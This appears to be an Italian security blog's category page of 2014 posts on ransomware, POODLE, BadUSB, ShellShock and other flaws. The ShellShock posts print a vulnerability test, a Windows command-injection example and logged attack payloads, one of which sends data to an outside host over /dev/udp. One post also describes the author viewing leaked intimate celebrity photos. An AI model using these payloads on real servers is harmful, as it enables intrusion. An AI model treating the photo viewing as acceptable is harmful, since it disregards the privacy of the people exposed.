SIAMO GEEK

Categoria: Sicurezza

Sicurezza informatica

  • È sufficiente il backup

    Brano dall'articolo "Dea, un altro blocco dei pc" apparso su La Provincia Pavese del 26/10/2014 e riportato in accordo al diritto di citazione
    Brano dall’articolo “Dea, un altro blocco dei pc” apparso su La Provincia Pavese del 26/10/2014 e riportato in accordo con il diritto di citazione

    Il quotidiano locale di Pavia oggi riporta la notizia di un disservizio del DEA che si protrarrebbe da alcuni giorni.

    Tra le righe, benché non venga citato espressamente il nome nell’articolo, si capisce che il problema è stato causato da una delle varianti di Cryptolocker.

    La chiusa dell’articolo, riportata a fianco, dice espressamente che il pagamento del riscatto è “l’unico modo conosciuto finora per decrittare i dati”.

    Affermazione vera nella forma, ma che lascia intendere una falsità nella sostanza. (altro…)

  • Zero-Day contro PowerPoint

    Ieri Microsoft ha rilasciato un bollettino di sicurezza su una vulnerabilità della tecnologia OLE.

    Il bollettino parla di limitati exploit in circolazione che sfruttano PowerPoint, altri non sono così ottimisti. Sono interessate tutte le versioni a 32 bit di Microsoft Office. Attenzione che il 32 bit si riferisce alla versione di Office, non del sistema operativo, quindi un Office a 32 bit che gira su un Windows a 64 bit è vulnerabile.

    Chi ha potuto esaminare l’exploit riporta che, se è attivo UAC, viene richiesto il permesso per eseguire un programma con privilegi elevati, la qual cosa dovrebbe insospettire l’utente (ma ci sono poche speranze).

    Microsoft ha rilasciato anche un QuickFix in attesa della patch definitiva via Windows Update, a testimonianza del fatto che la diffusione dell’exploit potrebbe non essere così limitata.

    Il consiglio è di installare quanto prima il QuickFix e di non aprire allegati di documenti Office (PowerPoint, Word, Excel) che provengono da fonti sconosciute, specialmente se contenuti in file compressi (ZIP).

  • POODLE

    POODLE (Padding Oracle On Downgraded Legacy Encryption) è un tipo di attacco alle connessioni https in grado di rubare informazioni sensibili, incluse, teoricamente, le password degli account.

    L’attacco si basa su una vulnerabilità di SSLv3, RFC6101, un protocollo del novembre 1996 poco sicuro che fa parte del gruppo di protocolli di scambio dati previsti da https e da tutti i protocolli che usano TLS, come IMAPS, POP3S, SMTP con STARTTLS, eccetera.

    Quando viene iniziata una connessione TLS client e server confrontano i protocolli supportati e negoziano il più sicuro tra quelli supportati da entrambi. Tuttavia è anche possibile che un attaccante in grado di disturbare la connessione tra client e server riesca a forzare usa sessione con il protocollo meno sicuro. (altro…)

  • Dispositivi USB vulnerabili

    PS2251-03-Q
    by www.flashdrive-repair.com

    Questa estate era stata pubblicata la notizia di un problema di sicurezza di alcuni microcontroller USB prodotti da Phison.

    Il problema consiste nella possibilità da parte di un applicativo qualsiasi di riprogrammare il firmware di un dispositivo USB connesso ad un computer. Una volta riprogrammato, il firmware del dispositivo può comportarsi in maniera dannosa e mettere a repentaglio la sicurezza del computer a cui è connesso. I ricercatori che avevano fatto questa scoperta avevano deciso di non pubblicare alcuna informazione utile per sfruttare questa vulnerabilità.

    Pochi giorni fa Adam Caudill e Brandon Wilson hanno deciso di pubblicare su GitHub il software che sfrutta questa vulnerabilità.

    Il software pubblicato funziona con il controller PS2251-03 di Phison, che gli autori del software hanno trovato in alcuni device. Tuttavia i controller di Phison sono molto utilizzati e sicuramente la lista dei dispositivi pubblicata dagli autori non è completa.

    (altro…)

  • ShellShock anche per Windows?

    winshockSh1bumi ha pubblicato una possibile versione di ShellShock per Windows.

    In questo caso, il comando ECHO esegue anche il comando contenuto nella variabile:

    >set pippo=pluto^&ping localhost

>echo %pippo%
pluto

Pinging localhost [::1] with 32 bytes of data:

    La sequenza ^& contiene il carattere di escape ^ e il carattere & che significa “esegui il comando che segue al termine del precedente”. Il carattere di escape serve a non eseguire il ping dopo il comando set, ma a mettere la stringa pluto&ping localhost nella variabile d’ambiente pippo.

    Il test è facilmente replicabile su una command line di Windows, l’immagine qui sopra è stata catturata in un Windows 7.

    L’utilizzo di file batch non è diffuso in Windows quanto gli script shell sono utilizzati in *NIX e la possibilità che qualche servizio esposto a Internet da un server Windows passi un input non sanificato ad un batch che esegue un echo di quel valore è molto inferiore ad un problema analogo su *NIX, ma il problema esiste.

  • Tentativi di exploit di ShellShock

    Poco tempo dopo l’annuncio di ShellShock i tentativi di hacking sono già iniziati.

    Questa mattina i log di alcuni server che amministro rivelano quasi tutti l’accesso con masscan spiegato in questo articolo, ma si tratta di un’analisi, non di un tentativo vero e proprio di sfruttare la vulnerabilità. In questo caso la stringa richiesta via http è quella che si vede nell’articolo.

    Anche il servizio di hosting Snel sta facendo passare la rete alla ricerca di host vulnerabili dall’IP 89.207.135.125:

    “GET /cgi-sys/defaultwebpage.cgi HTTP/1.0” 404 63579 “-” “() { :;}; /bin/ping -c 1 198.101.206.138”

    Un altro apparente test, ma con richieste più dettagliate arriva dall’IP 54.251.83.67 appartenente al cloud computing di Amazon:

    “GET / HTTP/1.1” 200 4093 “-” “() { :;}; /bin/bash -c \”echo testing9123123\”; /bin/uname -a”

    Altro tentativo dal 24.251.197.244, un IP di Cox:

    “GET / HTTP/1.1” 200 208051 “-” “() { :; }; echo -e \”Content-Type: text/plain\\n\”; echo qQQQQQq”

    Decisamente il meno amichevole di tutti il tentativo che proviene dall’IPv6 2001:4800:7812:514:1b50:2e05:ff04:c849 di un datacentre americano di RackSpace

    “GET / HTTP/1.1” 200 208133 “-” “() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444”

    Notare qui l’uso di /dev/udp descritto in questo articolo.

  • ShellShock

    È stato scoperto un baco serio in bash, che consente, in determinate situazioni, ad un attaccante di eseguire programmi arbitrari sul computer della vittima (RCE, Remote Code Execution).

    bash è probabilmente la shell più diffusa tra i sistemi *NIX, in quanto è la shell di default della gran parte delle distribuzioni Linux ed è la shell utilizzata da OSX.

    La shell è il programma che permette all’utente di eseguire altri programmi, interagire con il file system e il sistema operativo ed eseguire altre azioni in relazione all’ambiente e al tipo di shell. Oltre a bash, gli ambienti *NIX hanno, tra le altre, zsh, csh, sh. La shell di Windows è Explorer.exe, prima di Windows c’era COMMAND.COM, che alcuni sostituivano con 4DOS.

    Il metodo veloce per scoprire se una bash è vulnerabile è eseguire questo comando:

    env x='() { :;}; echo vulnerabile' bash -c "echo io sono un test"

    Se bash non ritorna un warning, ma scrive semplicemente vulnerabile e poi io sono un test, la bash è vulnerabile.

    Innanzi tutto: non è vero che ogni computer che ha bash a bordo è vulnerabile per il fatto di avere bash a bordo.

    (altro…)

  • Sicurezza, trasparenza, facilità d’uso

    Lascio all’articolo precedente lo sviluppo del lato tecnico della storia del furto di immagini, qui vorrei fare qualche commento.

    In molti abbiamo perso dei dati o abbiamo scoperto che per un errore (nostro o informatico) alcuni dati sono finiti in un contesto pubblico quando sarebbero dovuti rimanere privati. Ma quando si tratta di parti intime di persone famose o dei loro partner l’evento diventa una notizia. (altro…)

  • Dati tra le nuvole

    Bella la funzione di storage automatico sul cloud online, ma…

    Non è la prima volta che succede un casino e sicuramente non è nemmeno l’ultima, ma questa ha tutti i connotati delle 5 S di un certo giornalismo (sesso, sesso, sesso, sesso, sesso).

    È oramai noto che sarebbero state trafugate delle foto molto personali di alcune celebrità.

    Ho recuperato alcune foto da una fonte che credo sia attendibile e ne ho guardate un po’. Enfasi su un po’ perché dopo la l’n-sima serie di tette, fighe e culi ripresi male in contesti privati uno si stufa anche.

    (altro…)

  • Nuove politiche per MSIE

    Microsoft ha annunciato una serie di novità per il supporto di Internet Explorer.

    I tempi potrebbero sembrare geologici, ma questi cambiamenti hanno profonde ripercussioni nelle organizzazioni multinazionali che utilizzano Internet Explorer come frontend per le procedure interne.

    A partire dal 12 gennaio 2016 solamente le ultime versioni di Internet Explorer per ciascuna piattaforma riceveranno supporto e aggiornamenti. La decisione è decisamente sensata, in quanto limita la complessità del supporto e riduce i vettori di attacco verso i client.

    Allo stato attuale, le ultime versioni disponibili per le varie piattaforme sono:

    • Windows Vista SP2: Internet Explorer 9
    • Windows Server 2008 SP2: Internet Explorer 9
    • Windows Server 2012: Internet Explorer 10
    • Windows 7 SP1: Internet Explorer 11
    • Windows Server 2008 R2 SP1: Internet Explorer 11
    • Windows 8.1: Internet Explorer 11
    • Windows Server 2012 R2: Internet Explorer 11

    (altro…)

  • Synolocker

    Il famoso ransomware CrysynolockerptoLocker e` stato, a quanto pare, adattato per poter girare direttamente dentro ai NAS Synology. Al momento non so in quale modo viene portato l’attacco, ovvero in che modo il malware si installi nel NAS, ma mi sembra ovvio che sia opportuno prendere in considerazione le classiche misure di sicurezza, soprattutto fino a che non sara` fatta piu` luce sul problema.

     

     

    1. Se possibile, staccare totalmente il NAS da internet
    2. Se non e` possibile, esporre solo le porte veramente necessarie. Ad esempio esporre la porta del file manager ma non quella dell’amministrazione
    3. Esporre se possibile il NAS usando porte non standard (riduce il rischio di essere oggetto di un attacco casuale)
    4. Assicurarsi che il NAS non sfrutti UPNP per aprire delle porte sul router all’insaputa dell’utente
    5. Impostare password complesse e lunghe
    6. Aggiornare il firmware del NAS
    7. Tenere un backup offline dei files.

     

    Visto che ancora non si sa come il malware penetri nel NAS, puo` essere che la via di infezione sia a mezzo di un altro malware che gira su un PC Windows nella LAN del NAS, in questo caso le precauzioni relative all’accesso via internet sarebbero inutili, ma e` comunque meglio prenderle in considerazione tutte. E` altrettanto logico che un PC infetto sul quale sia stata salvata (o anche solo digitata) la password di amministrazione e` un vettore di attacco contro il quale non c’e` soluzione, se non spegnere il NAS. 🙂

    Aggiornamento: Cercando notizie in giro ho scoperto che da parecchio tempo (diversi mesi, pare) e` in giro un malware che infetta i NAS Synology e che mina bitcoin, senza fare altri danni. A parte che trovo assurdo minare bitcoin con le CPU ridicole che si trovano nei NAS, questo nuovo malware potrebbe evidentemente avere ereditato le capacita` di attacco dal vecchio bitcoin miner.

     

     

  • Zero Day in Symantec Endpoint Protection

    I ricercatori di Offensive Security hanno scoperto alcune vulnerabilità in Symantec Endpoint Protection.

    Per il momento l’organizzazione ha deciso di non pubblicare il codice per sfruttare queste vulnerabilità, ma si è limitata a pubblicare un video dove si vede un Windows 7 32 bit SP1 aggiornato con installato l’ultima versione 12.1.4100.4126 aggiornata del software di Symantec in cui un utente non privilegiato esegue uno script in Python per guadagnare il privilegio di SYSTEM.

    Symantec è al corrente del problema e sta investigando. Non ci sono notizie per ora di programmi che possano sfruttare questa vulnerabilità per attaccare un computer.

    Un problema in un software di questo tipo è molto serio, per di più Symantec Endpoint Protection è molto utilizzato anche nelle grosse organizzazioni.

    Il consiglio che vale per tutti, indipendentemente dall’antivirus installato, è che un software di protezione non garantisce l’immunità completa, sia per la grande varietà di malware in circolazione, sia per l’ovvia regola che esce prima il virus della definizione dell’antivirus. (via ISC)

    Security Focus ha assegnato al problema l’ID 68946.

    Aggiornamenti dopo la pubblicazione iniziale

    • Aggiunto link all’articolo di Security Focus